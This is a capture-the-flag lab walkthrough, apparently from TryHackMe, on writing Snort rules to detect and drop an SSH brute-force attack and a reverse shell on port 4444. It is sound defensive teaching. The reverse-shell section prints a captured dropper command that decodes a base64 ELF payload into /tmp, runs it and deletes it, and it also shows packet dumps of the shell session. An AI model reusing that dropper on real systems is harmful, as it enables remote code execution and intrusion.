SNORT CHALLENGE (LIVE ATTACKS)
SCENARIO 1: BRUTE FORCE
Write a snort IPS rule that will stop an observed brute force attack to receive the flag.
#identify the system's interfaces
root@thm:~$ ifconfig
* eth0: 10.10.30.67
eth1: 10.234.0.1
#identify service ports
root@thm:~$ netstat -natup
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 786/Xtigervnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:49352 127.0.0.1:5901 ESTABLISHED -
tcp 0 0 10.10.30.67:80 10.100.1.146:45444 ESTABLISHED -
tcp 0 0 10.10.30.67:80 10.100.1.146:42256 ESTABLISHED -
tcp 0 0 127.0.0.1:5901 127.0.0.1:49352 ESTABLISHED 786/Xtigervnc
tcp 0 0 127.0.0.1:5901 127.0.0.1:49286 ESTABLISHED 786/Xtigervnc
tcp 0 0 127.0.0.1:49286 127.0.0.1:5901 ESTABLISHED -
#identify the interface where there is traffic
root@thm:~$ sudo snort -Xe -i eth1
* no traffic
root@thm:~$ sudo snort -Xe -i eth0
* w/ traffic
* ALT: sudo snort -Xe -i eth0:eht1#run snort on sniffer mode & identify the attack source, service and port
#* a brute force attack often appears as a series of repeated connection
#* attempts to a specific service or port in a short period. These attempts
#* often originate from the same IP address or a set of IP addresses and are
#* aimed at guessing credentials.
root@thm:~$ sudo snort -Xev -A Full -l .
* -X Display the full packet details in HEX.
- The -X option implicitly includes -v and -d because it outputs the packet payload in a detailed format, including both hex and ASCII representations.
- he -e option is not covered by -X, as it specifically adds link-layer headers, which are not part of the payload dump.
* the -l creates the logs in the specified directory
- the above example creates the logs in the 'current directory'
- the default output directory can be configured in the snort.config file
- the default log directory is useful for continuous monitoring operations, and the "-l" parameter is much more useful for testing purposes.
* Use Case: Provides the most granular detail for packet inspection, including headers and payload, in both raw and human-readable formats.
root@thm:~$ CTRL+C
* stop the capture once enough traffic is acquired
root@thm:~$ ls
snort.log.1736382708
#perform analysis
root@thm:~$ sudo strings snort.log.1736384366
* port 80 traffic doesn't seem interesting
* port 22 traffic seems interesting
- SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4
root@dco:~$ sudo snort -r snort.log.1736384366 -X -d port 80
* nothing interesting
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22
01/09-00:59:36.459070 10.10.245.36:46500 -> 10.10.140.29:22
TCP TTL:64 TOS:0x0 ID:17401 IpLen:20 DgmLen:948 DF
***AP*** Seq: 0x4172748E Ack: 0x99A57D7B Win: 0x1EB TcpLen: 32
TCP Options (3) => NOP NOP TS: 1884551896 4119659328
0x0000: 02 6D 84 B4 B4 1B 02 67 7A 27 40 23 08 00 45 00 .m.....gz'@#..E.
0x0010: 03 B4 43 F9 40 00 40 06 5D F5 0A 0A F5 24 0A 0A ..C.@.@.]....$..
0x0020: 8C 1D B5 A4 00 16 41 72 74 8E 99 A5 7D 7B 80 18 ......Art...}{..
0x0030: 01 EB B4 FB 00 00 01 01 08 0A 70 53 FA D8 F5 8D ..........pS....
0x0040: 03 40 00 00 03 7C 0B 14 18 F1 A2 5E 70 1B AA 46 .@...|.....^p..F
0x0050: DC CA D9 07 49 EA E5 3C 00 00 00 71 63 75 72 76 ....I..<...qcurv
0x0060: 65 32 35 35 31 39 2D 73 68 61 32 35 36 40 6C 69 e25519-sha256@li
0x0070: 62 73 73 68 2E 6F 72 67 2C 65 63 64 68 2D 73 68 bssh.org,ecdh-sh
0x0080: 61 32 2D 6E 69 73 74 70 32 35 36 2C 65 63 64 68 a2-nistp256,ecdh...
#filter the traffic to determine the rate of repeated connections
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22 | grep :22
01/09-00:59:27.138410 10.10.140.29:22 -> 10.10.245.36:46474
01/09-00:59:27.145530 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.158446 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.178475 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.185512 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.204390 10.10.140.29:22 -> 10.10.245.36:46470
01/09-00:59:27.222635 10.10.245.36:46474 -> 10.10.140.29:22
01/09-00:59:27.238635 10.10.140.29:22 -> 10.10.245.36:46474
01/09-00:59:27.258666 10.10.245.36:46470 -> 10.10.140.29:22
01/09-00:59:27.265190 10.10.140.29:22 -> 10.10.245.36:46470#write an IPS rule to detect the offending packet - this will identify potential brute force attack
#HTTP brute force alert detection
#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
Search: flow
- https://docs.snort.org/rules/options/non_payload/flow?highlight=server#flow
#create a generic test rule to identify the offending packet
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
alert tcp any any <> any 22 (msg:"SSH Connection Attempt"; content:"SSH-"; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/rules/local.rules -r snort.log.1736384366 -A full -l .
root@thm:~$ ls
alert snort.log.1736384366 snort.log.1736386360
root@thm:~$ cat alert
[**] [1:1000001:1] SSH Connection Attempt [**] #create a rule to drop the ssh brute force packets
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
drop tcp any 22 <> any any (msg:"SSH Connection Attempt"; content:"SSH-"; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/snort.conf -q -Q --daq afpacket -i eth0:eth1 -A full
* wait until a 'ongratulations. you have successfully stopped the attack' msg pops up
* the Data Acquisition (DAQ) option activates snort as an IPS and uses the afpacket module
- snort ips mode requires at least TWO nics -i eth0:eth1
* this mode can also be activated by editing the snort.conf file
root@thm:~$ ls Desktop
flag.txt
root@thm:~$ cat flag.txt
THM{81b7fef657f8aaa6e4e200d616738254}What is the name of the service under attack?
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22
01/09-00:59:36.459070 10.10.245.36:46500 -> 10.10.140.29:22
TCP TTL:64 TOS:0x0 ID:17401 IpLen:20 DgmLen:948 DF
***AP*** Seq: 0x4172748E Ack: 0x99A57D7B Win: 0x1EB TcpLen: 32
TCP Options (3) => NOP NOP TS: 1884551896 4119659328
0x0000: 02 6D 84 B4 B4 1B 02 67 7A 27 40 23 08 00 45 00 .m.....gz'@#..E.
0x0010: 03 B4 43 F9 40 00 40 06 5D F5 0A 0A F5 24 0A 0A ..C.@.@.]....$..
0x0020: 8C 1D B5 A4 00 16 41 72 74 8E 99 A5 7D 7B 80 18 ......Art...}{..
0x0030: 01 EB B4 FB 00 00 01 01 08 0A 70 53 FA D8 F5 8D ..........pS....
0x0040: 03 40 00 00 03 7C 0B 14 18 F1 A2 5E 70 1B AA 46 .@...|.....^p..F
0x0050: DC CA D9 07 49 EA E5 3C 00 00 00 71 63 75 72 76 ....I..<...qcurv
0x0060: 65 32 35 35 31 39 2D 73 68 61 32 35 36 40 6C 69 e25519-sha256@li
0x0070: 62 73 73 68 2E 6F 72 67 2C 65 63 64 68 2D 73 68 bssh.org,ecdh-sh
0x0080: 61 32 2D 6E 69 73 74 70 32 35 36 2C 65 63 64 68 a2-nistp256,ecdh...
* sshWhat is the used protocol/port in the attack?
root@thm:~$ sudo snort -r snort.log.1736384366 -X -d port 22
01/09-00:59:36.459070 10.10.245.36:46500 -> 10.10.140.29:22
TCP TTL:64 TOS:0x0 ID:17401 IpLen:20 DgmLen:948 DF
***AP*** Seq: 0x4172748E Ack: 0x99A57D7B Win: 0x1EB TcpLen: 32
TCP Options (3) => NOP NOP TS: 1884551896 4119659328
0x0000: 02 6D 84 B4 B4 1B 02 67 7A 27 40 23 08 00 45 00 .m.....gz'@#..E.
0x0010: 03 B4 43 F9 40 00 40 06 5D F5 0A 0A F5 24 0A 0A ..C.@.@.]....$..
0x0020: 8C 1D B5 A4 00 16 41 72 74 8E 99 A5 7D 7B 80 18 ......Art...}{..
0x0030: 01 EB B4 FB 00 00 01 01 08 0A 70 53 FA D8 F5 8D ..........pS....
0x0040: 03 40 00 00 03 7C 0B 14 18 F1 A2 5E 70 1B AA 46 .@...|.....^p..F
0x0050: DC CA D9 07 49 EA E5 3C 00 00 00 71 63 75 72 76 ....I..<...qcurv
0x0060: 65 32 35 35 31 39 2D 73 68 61 32 35 36 40 6C 69 e25519-sha256@li
0x0070: 62 73 73 68 2E 6F 72 67 2C 65 63 64 68 2D 73 68 bssh.org,ecdh-sh
0x0080: 61 32 2D 6E 69 73 74 70 32 35 36 2C 65 63 64 68 a2-nistp256,ecdh...
* tcp/22SCENARIO 2: REVERSE SHELL
Write a snort IPS rule that will stop an observed reverse shell to receive the flag.
#identify the system's interfaces
root@thm:~$ ifconfig
* eth0: 10.10.27.124
eth1: 10.234.0.1
#identify service ports
root@thm:~$ netstat -natup
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 796/Xtigervnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 1 10.10.27.124:43854 185.125.188.54:443 SYN_SENT -
tcp 0 0 127.0.0.1:33814 127.0.0.1:5901 ESTABLISHED -
tcp 0 1 10.10.27.124:43850 185.125.188.54:443 SYN_SENT -
tcp 0 1 10.10.27.124:43852 185.125.188.54:443 SYN_SENT -
tcp 0 0 127.0.0.1:5901 127.0.0.1:33814 ESTABLISHED 796/Xtigervnc
tcp 0 1 10.10.27.124:42596 185.125.188.59:443 SYN_SENT -
tcp 0 0 10.10.27.124:80 10.100.1.217:41390 ESTABLISHED -
#identify the interface where there is traffic
root@thm:~$ sudo snort -Xev -i eth1
* no traffic
root@thm:~$ sudo snort -Xev -i eth0
* w/ traffic
* ALT: sudo snort -Xe -i eth0:eht1#run snort on sniffer mode & identify the attack source, service and port
#* a brute force attack often appears as a series of repeated connection
#* attempts to a specific service or port in a short period. These attempts
#* often originate from the same IP address or a set of IP addresses and are
#* aimed at guessing credentials.
root@thm:~$ sudo snort -Xev -A Full -l .
* -X Display the full packet details in HEX.
- The -X option implicitly includes -v and -d because it outputs the packet payload in a detailed format, including both hex and ASCII representations.
- he -e option is not covered by -X, as it specifically adds link-layer headers, which are not part of the payload dump.
* the -l creates the logs in the specified directory
- the above example creates the logs in the 'current directory'
- the default output directory can be configured in the snort.config file
- the default log directory is useful for continuous monitoring operations, and the "-l" parameter is much more useful for testing purposes.
* Use Case: Provides the most granular detail for packet inspection, including headers and payload, in both raw and human-readable formats.
root@thm:~$ CTRL+C
* stop the capture once enough traffic is acquired
root@thm:~$ ls
snort.log.1736390738
#perform analysis
root@thm:~$ sudo strings snort.log.1736390738
echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgqQnGgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/NlsQY.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/anCTe' < '/tmp/NlsQY.b64' ; chmod +x '/tmp/anCTe' ; '/tmp/anCTe' & sleep 2 ; rm -f '/tmp/anCTe' ; rm -f '/tmp/NlsQY.b64';echo YRvcrcHrawxdWniMfQcmGDlLBKRtSQpQ
root@dco:~$ sudo snort -r snort.log.1736390738 -X
01/09-02:45:58.220551 10.10.196.55:54156 -> 10.10.144.156:4444
TCP TTL:64 TOS:0x0 ID:6728 IpLen:20 DgmLen:134 DF
***AP*** Seq: 0xBCF7B318 Ack: 0x50ED995F Win: 0x1E5 TcpLen: 32
TCP Options (3) => NOP NOP TS: 2358867399 1981035098
0x0000: 02 15 8B 5C 4F EF 02 7C 9A 93 DF DD 08 00 45 00 ...\O..|......E.
0x0010: 00 86 1A 48 40 00 40 06 B7 42 0A 0A C4 37 0A 0A ...H@.@..B...7..
0x0020: 90 9C D3 8C 11 5C BC F7 B3 18 50 ED 99 5F 80 18 .....\....P.._..
0x0030: 01 E5 69 60 00 00 01 01 08 0A 8C 99 75 C7 76 14 ..i`........u.v.
0x0040: 32 5A 1B 5D 30 3B 75 62 75 6E 74 75 40 69 70 2D 2Z.]0;ubuntu@ip-
0x0050: 31 30 2D 31 30 2D 31 39 36 2D 35 35 3A 20 7E 07 10-10-196-55: ~.
0x0060: 1B 5B 30 31 3B 33 32 6D 75 62 75 6E 74 75 40 69 .[01;32mubuntu@i
0x0070: 70 2D 31 30 2D 31 30 2D 31 39 36 2D 35 35 1B 5B p-10-10-196-55.[
0x0080: 30 30 6D 3A 1B 5B 30 31 3B 33 34 6D 7E 1B 5B 30 00m:.[01;34m~.[0
0x0090: 30 6D 24 20 0m$
* port 4444 is a known default metasploit listening port
root@thm:~$ sudo snort -r snort.log.1736390738 -X -d port 4444
01/09-02:45:57.803324 10.10.196.55:54156 -> 10.10.144.156:4444
TCP TTL:64 TOS:0x0 ID:6721 IpLen:20 DgmLen:228 DF
***AP*** Seq: 0xBCF7AEBF Ack: 0x50ED9632 Win: 0x1EB TcpLen: 32
TCP Options (3) => NOP NOP TS: 2358859827 1981027526
0x0000: 02 15 8B 5C 4F EF 02 7C 9A 93 DF DD 08 00 45 00 ...\O..|......E.
0x0010: 00 E4 1A 41 40 00 40 06 B6 EB 0A 0A C4 37 0A 0A ...A@.@......7..
0x0020: 90 9C D3 8C 11 5C BC F7 AE BF 50 ED 96 32 80 18 .....\....P..2..
0x0030: 01 EB 69 BE 00 00 01 01 08 0A 8C 99 58 33 76 14 ..i.........X3v.
0x0040: 14 C6 75 6E 61 6D 65 20 2D 6D 73 3B 65 63 68 6F ..uname -ms;echo
0x0050: 20 4A 59 48 56 65 46 4A 51 67 6F 72 55 52 70 64 JYHVeFJQgorURpd
0x0060: 73 74 51 6B 4E 56 74 6E 50 7A 4F 41 6C 78 61 64 stQkNVtnPzOAlxad
0x0070: 62 0A 4C 69 6E 75 78 20 78 38 36 5F 36 34 0A 4A b.Linux x86_64.J
0x0080: 59 48 56 65 46 4A 51 67 6F 72 55 52 70 64 73 74 YHVeFJQgorURpdst
0x0090: 51 6B 4E 56 74 6E 50 7A 4F 41 6C 78 61 64 62 0A QkNVtnPzOAlxadb.
0x00A0: 1B 5D 30 3B 75 62 75 6E 74 75 40 69 70 2D 31 30 .]0;ubuntu@ip-10
0x00B0: 2D 31 30 2D 31 39 36 2D 35 35 3A 20 7E 07 1B 5B -10-196-55: ~..[
0x00C0: 30 31 3B 33 32 6D 75 62 75 6E 74 75 40 69 70 2D 01;32mubuntu@ip-
0x00D0: 31 30 2D 31 30 2D 31 39 36 2D 35 35 1B 5B 30 30 10-10-196-55.[00
0x00E0: 6D 3A 1B 5B 30 31 3B 33 34 6D 7E 1B 5B 30 30 6D m:.[01;34m~.[00m
0x00F0: 24 20 $
#filter the traffic to determine the rate of repeated connections
root@thm:~$ sudo snort -r snort.log.1736390738 -X -d port 4444 | grep :4444
01/09-02:45:53.483068 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.483078 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.563507 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.563532 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.563541 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.563550 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.563559 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.564050 10.10.196.55:54156 -> 10.10.144.156:4444
01/09-02:45:53.574576 10.10.144.156:4444 -> 10.10.196.55:54156
01/09-02:45:53.585139 10.10.144.156:4444 -> 10.10.196.55:54156#write an IPS rule to detect the offending packet - this will identify potential attack
#reverse shell alert detection
#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
Search: flow
- https://docs.snort.org/rules/options/non_payload/flow?highlight=server#flow
#create a generic test rule to identify the offending packet
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
alert tcp any 4444 <> any any (msg:"Potential Reverse Shell on Known Metasploit Port"; flow:established; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/rules/local.rules -r snort.log.1736390738 -A full -l .
root@thm:~$ ls
alert snort.log.1736384366 snort.log.1736386360
root@thm:~$ cat alert
[**] [1:1000001:1] Potential Reverse Shell on Known Metasploit Port [**]
[Priority: 0]
01/09-02:45:58.283339 10.10.144.156:4444 -> 10.10.196.55:54156
TCP TTL:64 TOS:0x0 ID:64573 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x50ED9960 Ack: 0xBCF7B36B Win: 0x1E2 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1981035162 2358867417#create a rule to drop the ssh brute force packets
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@thm:~$ nano /etc/snort/rules/local.rules
drop tcp any 4444 <> any any (msg:"Potential Reverse Shell on Known Metasploit Port"; flow:established; sid:1000001; rev:1;)
root@thm:~$ sudo snort -c /etc/snort/snort.conf -q -Q --daq afpacket -i eth0:eth1 -A full
* wait until a 'congratulations. you have successfully stopped the attack' msg pops up
* the Data Acquisition (DAQ) option activates snort as an IPS and uses the afpacket module
- snort ips mode requires at least TWO nics -i eth0:eth1
* this mode can also be activated by editing the snort.conf file
root@thm:~$ ls Desktop
flag.txt
root@thm:~$ cat flag.txt
THM{0ead8c494861079b1b74ec2380d2cd24}What is the used protocol/port in the attack?
root@dco:~$ sudo snort -r snort.log.1736390738 -X
01/09-02:45:58.220551 10.10.196.55:54156 -> 10.10.144.156:4444
TCP TTL:64 TOS:0x0 ID:6728 IpLen:20 DgmLen:134 DF
***AP*** Seq: 0xBCF7B318 Ack: 0x50ED995F Win: 0x1E5 TcpLen: 32
TCP Options (3) => NOP NOP TS: 2358867399 1981035098
0x0000: 02 15 8B 5C 4F EF 02 7C 9A 93 DF DD 08 00 45 00 ...\O..|......E.
0x0010: 00 86 1A 48 40 00 40 06 B7 42 0A 0A C4 37 0A 0A ...H@.@..B...7..
0x0020: 90 9C D3 8C 11 5C BC F7 B3 18 50 ED 99 5F 80 18 .....\....P.._..
0x0030: 01 E5 69 60 00 00 01 01 08 0A 8C 99 75 C7 76 14 ..i`........u.v.
0x0040: 32 5A 1B 5D 30 3B 75 62 75 6E 74 75 40 69 70 2D 2Z.]0;ubuntu@ip-
0x0050: 31 30 2D 31 30 2D 31 39 36 2D 35 35 3A 20 7E 07 10-10-196-55: ~.
0x0060: 1B 5B 30 31 3B 33 32 6D 75 62 75 6E 74 75 40 69 .[01;32mubuntu@i
0x0070: 70 2D 31 30 2D 31 30 2D 31 39 36 2D 35 35 1B 5B p-10-10-196-55.[
0x0080: 30 30 6D 3A 1B 5B 30 31 3B 33 34 6D 7E 1B 5B 30 00m:.[01;34m~.[0
0x0090: 30 6D 24 20 0m$
* tcp/4444Last updated